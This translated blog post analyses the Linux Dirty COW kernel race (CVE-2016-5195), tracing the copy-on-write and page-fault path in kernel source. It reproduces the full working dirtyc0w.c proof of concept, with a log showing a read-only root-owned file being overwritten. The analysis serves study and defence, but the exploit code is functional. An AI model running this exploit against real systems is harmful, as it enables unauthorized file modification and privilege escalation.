[Original] Linux Kernel [CVE-2016-5195] (Dirty COW): How It Works
Ubuntu 16.04, kernel version 4.15.0-45-generic






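P1 and P2 are two processes, and P2 is created by P1 calling fork(). At this point P1 and P2 actually share the same physical pages. A page is copied only when one of the processes writes to it.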


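1. A child process usually calls one of the exec() family of functions to do its real work. (When a process wants to run another program, the only way to create a new process is fork(), so it first calls fork() to create a copy of itself, and then one of the copies, usually the child, calls exec to replace itself with the new program. This is the typical pattern for programs such as shells.) A defining property of the exec family is that, on success, control transfers directly to the entry point of the new program (for example, the technique most often used in glibc pwn: hijacking __malloc_hook to jump to a one_gadget that calls execve and spawns a shell).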



Suppose there is a process P1 that creates a new process P2, and then P1 modifies page 3.
The figures below show what happens before and after process P1 modifies page 3.

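Prototype: int madvise(void *addr, size_t length, int advice);

It tells the kernel that the user virtual memory in the range starting at addr and spanning length bytes is expected to follow a particular usage pattern.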



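1. First we create a file named foo whose permissions are read-only.

2. We open it with O_RDONLY, which returns the descriptor f, and store the file's status in the st structure (of type struct stat).

3. Next, mmap maps the file's contents into user space as a private copy-on-write mapping. The parameters have the following meanings: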



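The thread first opens /proc/self/mem with O_RDWR (for the current process, /proc/self/mem exposes the process's own memory, so writing to this file amounts to writing directly to the process's memory). If you test it, however, you will find: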


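In the PoC we seek to the address returned by mmap (that is, the address where the file is mapped). SEEK_SET tells the system that offset is the new read/write position. The thread then performs 100000000 writes in an attempt to change the contents of that memory (which was mapped with read permission only).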




Dirty COW is exactly what its name says: dirty (a dirty page) and COW (copy-on-write).


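The call flow for write(f,str,strlen(str)) is as follows:

Underneath, mem_rw is called. Here the file structure corresponds to /proc/self/mem, buf is the user-space data to be written, count is its size, and ppos is the offset.


mm_struct is defined as follows: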






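mem_rw first allocates a new page to use as a temporary buffer and then enters access_remote_vm.

The chain get_user_pages -> __get_user_pages_locked -> __get_user_pages follows because the write system call, inside the kernel, calls get_user_pages to obtain the memory page that is to be written.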




Next, faultin_page is called to handle the fault.




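After the second page fault completes, FOLL_WRITE has been cleared, so write permission is no longer required.

Normally, the kernel now obtains the corresponding page and the write can proceed directly. That write goes to the private copy in the mapped memory and does not affect the file on disk.

But suppose the madviseThread thread runs at this moment and marks the mmap'd region as MADV_DONTNEED, meaning it will not be used in the near future. The kernel then clears the page table entry for the mapped memory (the private page is discarded immediately). A fourth page fault is then generated.

So when the write is retried, a page fault is triggered and do_fault brings the page in again. Because FOLL_WRITE is now 0, the lookup no longer conflicts with the write semantics the way it did after the first fault. Instead the page is returned normally, and because no COW was performed, the subsequent write is synced to the read-only file. The result is an unauthorized write.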




Copy on Write







KSM (Kernel Samepage Merging)


sudo wget https://mirror.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.4.tar.xz
make bzImage -j4
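This flag tells the kernel that the next LWP to touch the specified address range is the LWP that will access this range most heavily. The kernel allocates memory and other resources for this range and LWP accordingly.
This flag advises the kernel that many processes or LWPs will access the specified address range randomly across the system. The kernel allocates memory and other resources for this range accordingly.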
Do not expect access in the near future.  (For the time being,
              the application is finished with the given range, so the
              kernel can free resources associated with it.)
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
  return NULL;
}

void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
>  The in the wild exploit we are aware of doesn't work on Red Hat
>  Enterprise Linux 5 and 6 out of the box because on one side of
>  the race it writes to /proc/self/mem, but /proc/self/mem is not
>  writable on Red Hat Enterprise Linux 5 and 6.
*/
  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
    lseek(f,(uintptr_t) map,SEEK_SET);
    c+=write(f,str,strlen(str));
  }
  printf("procselfmem %d\n\n", c);
  return NULL;
}

int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
  if (argc<3) {
  (void)fprintf(stderr, "%s\n",
      "usage: dirtyc0w target_file new_content");
  return 1; }
  pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
  f=open(argv[1],O_RDONLY);
  fstat(f,&st);
  name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping.  Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file.  It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
  pthread_create(&pth1,NULL,madviseThread,argv[1]);
  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
  pthread_join(pth1,NULL);
  pthread_join(pth2,NULL);
  return 0;
}
struct stat64 {
    unsigned long long    st_dev;
    unsigned char    __pad0[4];
    unsigned long    __st_ino;
    unsigned int    st_mode;
    unsigned int    st_nlink;
    unsigned long    st_uid;
    unsigned long    st_gid;
    unsigned long long    st_rdev;
    unsigned char    __pad3[4];
    long long    st_size;
    unsigned long    st_blksize;
    /* Number 512-byte blocks allocated. */
    unsigned long long    st_blocks;
    unsigned long    st_atime;
    unsigned long    st_atime_nsec;
    unsigned long    st_mtime;
    unsigned int    st_mtime_nsec;
    unsigned long    st_ctime;
    unsigned long    st_ctime_nsec;
    unsigned long long    st_ino;
};
void *mmap(void *addr, size_t length, int prot, int flags,
                  int fd, off_t offset);
root@ubuntu:~/linux-4.4-env# cat /proc/66310/mem
cat: /proc/66310/mem: Input/output error
off_t lseek(int fd, off_t offset, int whence);
static ssize_t mem_write(struct file *file, const char __user *buf,
             size_t count, loff_t *ppos)
{
    return mem_rw(file, (char __user*)buf, count, ppos, 1);
}
struct mm_struct {
    struct vm_area_struct * mmap;       /* list of VMAs */
    struct rb_root mm_rb;
    struct vm_area_struct * mmap_cache; /* last find_vma result */
    unsigned long (*get_unmapped_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
       unsigned long (*get_unmapped_exec_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
    void (*unmap_area) (struct mm_struct *mm, unsigned long addr);
    unsigned long mmap_base;        /* base of mmap area */
    unsigned long task_size;        /* size of task vm space */
    /*
     * RHEL6 special for bug 790921: this same variable can mean
     * two different things. If sysctl_unmap_area_factor is zero,
     * this means the largest hole below free_area_cache. If the
     * sysctl is set to a positive value, this variable is used
     * to count how much memory has been munmapped from this process
     * since the last time free_area_cache was reset back to mmap_base.
     * This is ugly, but necessary to preserve kABI.
     */
    unsigned long cached_hole_size;
    unsigned long free_area_cache;      /* first hole of size cached_hole_size or larger */
    pgd_t * pgd;
    atomic_t mm_users;          /* How many users with user space? */
    atomic_t mm_count;          /* How many references to "struct mm_struct" (users count as 1) */
    int map_count;              /* number of VMAs */
    struct rw_semaphore mmap_sem;
    spinlock_t page_table_lock;     /* Protects page tables and some counters */
    struct list_head mmlist;        /* List of maybe swapped mm's.  These are globally strung
                         * together off init_mm.mmlist, and are protected
                         * by mmlist_lock
                         */
    /* Special counters, in some configurations protected by the
     * page_table_lock, in other configurations by being atomic.
     */
    mm_counter_t _file_rss;
    mm_counter_t _anon_rss;
    mm_counter_t _swap_usage;
    unsigned long hiwater_rss;  /* High-watermark of RSS usage */
    unsigned long hiwater_vm;   /* High-water virtual memory usage */
    unsigned long total_vm, locked_vm, shared_vm, exec_vm;
    unsigned long stack_vm, reserved_vm, def_flags, nr_ptes;
    unsigned long start_code, end_code, start_data, end_data;
    unsigned long start_brk, brk, start_stack;
    unsigned long arg_start, arg_end, env_start, env_end;
    unsigned long saved_auxv[AT_VECTOR_SIZE]; /* for /proc/PID/auxv */
    struct linux_binfmt *binfmt;
    cpumask_t cpu_vm_mask;
    /* Architecture-specific MM context */
    mm_context_t context;
    /* Swap token stuff */
    /*
     * Last value of global fault stamp as seen by this process.
     * In other words, this value gives an indication of how long
     * it has been since this task got the token.
     * Look at mm/thrash.c
     */
    unsigned int faultstamp;
    unsigned int token_priority;
    unsigned int last_interval;
    unsigned long flags; /* Must use atomic bitops to access the bits */
    struct core_state *core_state; /* coredumping support */
    spinlock_t      ioctx_lock;
    struct hlist_head   ioctx_list;
    /*
     * "owner" points to a task that is regarded as the canonical
     * user/owner of this mm. All of the following must be true in
     * order for it to be changed:
     *
     * current == mm->owner
     * current->mm != mm
     * new_owner->mm == mm
     * new_owner->alloc_lock is held
     */
    struct task_struct *owner;
    /* store ref to file /proc/<pid>/exe symlink points to */
    struct file *exe_file;
    unsigned long num_exe_file_vmas;
    struct mmu_notifier_mm *mmu_notifier_mm;
    pgtable_t pmd_huge_pte; /* protected by page_table_lock */
    /* reserved for Red Hat */
#ifdef __GENKSYMS__
    unsigned long rh_reserved[2];
#else
    /* How many tasks sharing this mm are OOM_DISABLE */
    union {
        unsigned long rh_reserved_aux;
        atomic_t oom_disable_count;
    };
    /* base of lib map area (ASCII armour) */
    unsigned long shlib_base;
#endif
};
/**
 * access_remote_vm - access another process' address space
 * @mm:        the mm_struct of the target address space
 * @addr:    start address to access
 * @buf:    source or destination buffer
 * @len:    number of bytes to transfer
 * @write:    whether the access is a write
 *
 * The caller must hold a reference on @mm.
 */
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
        void *buf, int len, int write)
{
    return __access_remote_vm(NULL, mm, addr, buf, len, write);
}
